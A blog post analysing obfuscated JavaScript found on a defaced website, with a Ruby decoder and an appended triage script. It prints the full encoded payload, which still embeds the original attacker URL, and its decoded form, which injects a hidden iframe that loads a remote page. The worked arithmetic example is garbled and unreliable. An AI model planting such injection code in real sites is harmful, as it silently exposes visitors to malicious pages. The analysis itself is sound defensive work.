The Hacked Site


After the publication of the Plex exploit, a friend of mine had one of his old sites defaced.

I asked him if he could send me the JavaScript that made his site look funny, and so he did.

 

 

The code:

n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54 a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47 .5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a3.5a3.5a3. 5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a3.5a3.5a61.5a15a49.5a53a56.5a49.5a15

a60.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5a57a49.5a19a16

a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.5a29.5a18.5a51a57a57a55a28a22.5a22.5

a51a51.5a56.5a57a54.5a56a57.5a54.5a50a57a51a54.5a58.5a49.5a56a56.5a22a48.5a54.5a

53.5a22.5a53.5a47.5a51.5a54a22a55a51a55a30.5a55a47.5a50.5a49.5a29.5a25a48.5a27a49

a48.5a24.5a25a27a26a26a25.5a26.5a23a24.5a23.5a48.5a18.5a15a58.5a51.5a49a57a51a29.5

a18.5a23.5a23a18.5a15a51a49.5a51.5a50.5a51a57a29.5a18.5a23.5a23a18.5a15a56.5a57

a59.5a53a49.5a29.5a18.5a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a28a51a51.5a 49a49a49.5a54a28.5a55a54.5a56.5a51.5a57a51.5a54.5a54a28a47.5a48a56.5a54.5a53

a57.5a57a49.5a28.5a53a49.5a50a57a28a23a28.5a57a54.5a55a28a23a28.5a18.5a30a29

a22.5a51.5a50a56a47.5a53.5a49.5a30a16a19.5a28.5a3.5a3.5a61.5a3.5a3.5a50a57.5a54

a48.5a57a51.5a54.5a54a15a51.5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a3.5a3.5a3.5a

58a47.5a56a15a50a15a29.5a15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a

47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53.5a49.5a18.5

a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a56.5a56

a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a51a51.5a56.5a57a54.5a56a57.5a54.5a50

a57a51a54.5a58.5a49.5a56a56.5a22a48.5a54.5a53.5a22.5a53.5a47.5a51.5a54a22a55a51a

55a30.5a55a47.5a50.5a49.5a29.5a25a48.5a27a49a48.5a24.5a25a27a26a26a25.5a26.5a23

a24.5a23.5a48.5a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48

a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a22a56.5a57a59.5a

53a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a56.5a54.5a53a57.5a57a

49.5a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a53a49.5a50a57a29.5a18.5a23a18.5a28.5a50

a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.5a18.5a23a18.5a28.5a50a22a56.5a49.5a57

a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49a57a51a18.5a21a18.5a23.5

a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5

a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a28.5a3.5a3.5a3.5a49a54.5

a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a

59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5

a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50a19.5a28.5a3.5a3.5a61.5".split("a");

for(i=0;0>-n.length+i;i++)

{j=i;ss=ss+s[f](-h*(1+1*n[j]));}

if(1)q=ss;if(f)e(q);</script>

Attackers like to obfuscate their intentions by mangling the code they want to execute. This time, they used some mathematics to get malicious code past the browser and any input checkers. So I started to dissect the code.

First of all, don’t execute this code in your browser!

The interesting part is the definition of n. This is a long string which embodies the code they want to execute.

Looking at the end of n, we see that they split it on the ‘a’ character, which yields an array of floats (fractional numbers).

Then they apply ss = ss + s[f](-h*(1+1*n[j])) to each element of n.

However, h is defined as: h = -2 * Math.log(Math.E);

For those who don’t know the math: log(e) = 1, so h is -2.

Back to the function. In essence, for each number in n they:

1. multiply it by 1 (in JavaScript this also turns the string into a number)
2. add 1 to this number
3. multiply by -h

So, to recap, if the input is 35.5

((25.5 * 1) + 1) * -2 = 52.

After that, they rebuild the string, using a function to recover the ASCII character for each calculated number. The result is the code to execute.

if(1)

q=ss

They conclude their work by copying the string and evaluating it. This tells JavaScript to execute the code inside the string.

I wrote this (Ruby 1.9) code to decode the string:

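# Encoded payload: decimal numbers separated by "a"
input = "3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a..... the complete String is listed above"

h = -2                             # the script's h: -2 * Math.log(Math.E)
arr = input.split("a")
text = ""

arr.each { |i|
  c = -h * (1 + (1 * Float(i)))    # same arithmetic as the JavaScript
  int = Integer(c)
  char = [int].pack("C*")          # byte value -> character
  text = text + char
}

puts text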

The resulting output is the following. Please note that I’ve removed the URLs, to be sure:

if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe style='visibility: hidden; position: absolute; left: 0; top: 0;' src='SCARY_URL' width='10' height='10'></iframe>");
}

function iframer(){
    var f = document.createElement('iframe');
    f.setAttribute('src','SCARY_URL');
    f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';
    f.setAttribute('width','10');
    f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
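For triage, the decoding step above can be combined with a check of the decoded text for hidden iframes, without ever running the script. The following is an added example, not code from the original post: the function names, the sample script and its `example.invalid` URL are constructed for illustration, and the decoder goes beyond the post's version by tolerating whitespace from copy and paste and rejecting unexpected tokens.

```ruby
# Static analysis only: the decoded script is treated as text, never executed.
H = -2.0 # h as described in the post: -2 * Math.log(Math.E)

# Inverse of the obfuscation, used here only to build a harmless sample.
def encode(text)
  text.bytes.map do |b|
    n = (b / -H) - 1
    n == n.to_i ? n.to_i.to_s : n.to_s
  end.join("a")
end

# Decode "a"-separated numbers; whitespace picked up by copy/paste is dropped.
def decode(blob)
  blob.gsub(/\s+/, "").split("a").map do |tok|
    raise ArgumentError, "unexpected token #{tok.inspect}" unless tok =~ /\A\d+(\.5)?\z/
    code = (-H * (1 + Float(tok))).to_i
    raise ArgumentError, "value #{code} is not ASCII" unless code.between?(0, 127)
    code.chr
  end.join
end

# Report iframe indicators found in decoded script text, with defanged URLs.
def iframe_findings(js)
  urls = js.scan(/src\s*=\s*['"]([^'"]+)['"]/).flatten +
         js.scan(/setAttribute\(\s*['"]src['"]\s*,\s*['"]([^'"]+)['"]/).flatten
  {
    urls: urls.uniq.map { |u| u.sub(/\Ahttp/i, "hxxp").gsub(".", "[.]") },
    hidden: js.match?(/visibility\s*[:=]\s*['"]?hidden/i),
    uses_iframe: js.match?(/iframe/i)
  }
end

# Constructed sample: a harmless stand-in script, encoded and line-wrapped
# the way a blob looks after being pasted into a page or e-mail.
SAMPLE_JS = %q{document.write("<iframe src='http://malware.example.invalid/in.php' width='10' height='10' style='visibility:hidden'></iframe>");}
SAMPLE_BLOB = encode(SAMPLE_JS).scan(/.{1,60}/).join("\n")

if __FILE__ == $0
  decoded = decode(SAMPLE_BLOB)
  puts decoded
  p iframe_findings(decoded)
end
```
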